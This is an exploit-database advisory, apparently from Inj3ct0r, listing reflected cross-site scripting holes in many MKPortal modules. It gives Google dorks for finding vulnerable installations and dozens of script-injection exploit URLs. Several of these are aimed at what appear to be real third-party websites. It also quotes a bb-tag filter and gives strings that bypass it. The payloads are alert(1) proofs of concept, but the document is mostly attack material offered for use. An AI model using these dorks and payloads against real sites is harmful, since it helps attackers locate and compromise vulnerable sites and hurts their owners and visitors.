=======================================
MKPortal <= global module Vulnerability
=======================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com

##################################################
Vulnerable products: MKPortal module gbook Exploit
Dork: "inurl:index.php?Ind=gbook"
##################################################


---------------------------------------------------------------------
	
1. Multiple pXSS
Vulnerability in the file index.php.

Exploit:


/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E


Example:

http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------------------------------------


2. Insert prohibited bb-tags [img] and [url] in the message

Vulnerability in the file index.php.
A vulnerable piece of code:

$message = stripslashes($message); 
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message); 
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message); 
$message = str_replace("ttp","", $message); 

get around restrictions:

[UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL]
[IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG]


##################################################
Vulnerable products: MKPortal module whois Exploit
Dork: "inurl:index.php?Ind=whois"
##################################################

	
1. pXSS
Vulnerability in the file index.php.


Exploit: 

/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E


##################################################
Vulnerable products: MKPortal module lenta Exploit
Dork: "inurl:index.php?ind=" graber lenta
##################################################

1. Multiple pXSS
Vulnerability in the file index.php.

Exploit: 

/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.nissanclub72.ru/index.php?ind=lentanews&blocks=%3Cscript%3Ealert(1)%3C/script%3E


####################################################
Vulnerable products: MKPortal modules metric Exploit
####################################################

1. pXSS

-----------------------------

metric

Exploit: 

/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E

------------------------------------------

recommend

Exploit: 

/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E

------------------------------------------

anekdot

Exploit: 

/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E

Example:

http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://www.isranetclub.com/isra/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------

contact

Exploit:

/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------

speed connection 

Exploit: 

/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------

horoscop 

Exploit: 

/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E

----------------------------

phones 

Exploit: 

/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E


In general, the vulnerability exists because of stupidity. 
the code is a variable that is formed during the execution of the script and she gradually
 appropriated the additional data. In the vulnerable code modules approximately as follows:

<? 
//code 
if (/*some*/) { 
    //some code 
    vuln_var .= 'some content'; 
    } else { 
    //some code 
    vuln_var .= 'some content'; 
    } 
//some code 
echo $vuln_var; 
//some code 
?>


	
This XSS extended to 90% of the modules for MKPortal from rusmkportal.ru  =]


----------------------------------------------

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net


# ~  - [ [ : Inj3ct0r : ] ]